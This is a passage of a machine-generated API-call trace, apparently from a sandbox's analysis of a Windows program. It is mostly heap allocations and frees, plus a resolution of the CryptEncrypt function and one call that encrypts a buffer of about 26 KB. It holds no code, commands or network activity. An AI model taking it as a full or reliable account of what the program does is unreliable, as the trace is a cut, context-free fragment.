(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0233.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0233.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0233.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0233.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0233.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0233.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0233.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0233.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0233.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0233.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0233.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0233.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0233.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0233.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0233.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0233.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0233.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0233.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0233.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0233.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0233.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0233.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0233.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0233.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0233.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0233.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f788 | out: hHeap=0x970000) returned 1 [0233.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0233.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0233.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0233.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0233.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0233.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0233.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0233.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0233.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0233.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0233.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0233.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0233.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0233.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0233.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0233.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0233.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0233.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0233.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0233.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0233.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0233.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0233.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0233.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0233.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0233.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0233.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0233.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0233.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0233.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0233.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0233.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x67e3) returned 0x2f27fe8 [0233.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0233.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f27fe8 | out: hHeap=0x970000) returned 1 [0233.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0233.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0233.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0233.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0233.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0233.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0233.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0233.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0233.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x978490 [0233.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0233.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0233.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0233.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0233.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0233.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0233.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0233.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0233.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0233.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0233.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0233.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0233.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0233.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0233.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0233.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0233.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0233.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0233.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0233.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0233.567] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0233.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0233.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0233.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0233.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0233.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0233.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0233.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0233.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0233.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0233.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0233.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0233.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0233.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0233.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0233.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0233.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0233.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0233.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0233.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0233.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0233.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0233.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0233.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0233.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0233.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0233.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0233.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0233.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0233.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0233.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0233.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0233.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0233.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0233.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0233.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0233.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0233.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0233.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0233.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0233.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0233.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0233.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0233.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0233.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0233.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0233.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0233.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0233.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0233.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0233.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0233.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0233.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0233.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0233.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0233.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0233.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0233.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0233.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0233.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0233.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0233.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0233.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0233.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0233.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0233.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0233.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0233.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0233.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0233.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0233.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0233.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0233.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0233.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0233.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0233.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51340 [0233.571] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51340, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0233.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0233.572] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0233.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0233.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0233.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f7b0 [0233.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0233.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0233.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0233.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0233.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0233.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0233.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0233.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0233.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0233.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0233.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0233.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0233.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0233.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0233.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0233.572] CryptEncrypt (in: hKey=0xa87110, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f217f8*, pdwDataLen=0x8cef60*=0x67e3, dwBufLen=0x67e8 | out: pbData=0x2f217f8*, pdwDataLen=0x8cef60*=0x67e8) returned 1 [0233.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0233.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0233.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0233.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0233.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0233.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0233.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0233.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0233.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0233.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0233.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0233.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0233.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0233.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0233.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0233.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0233.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0233.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0233.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0233.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0233.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0233.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0233.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0233.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0233.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0233.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0233.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0233.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0233.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0233.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0233.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0233.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0233.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0233.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0233.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0233.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0233.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0233.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0233.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0233.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0233.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0233.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0233.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0233.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0233.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0233.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0233.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0233.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0233.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0233.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0233.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0233.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0233.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0233.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0233.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0233.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0233.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0233.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0233.638] RtlAllocateHeap (HeapHandle=0x970000, 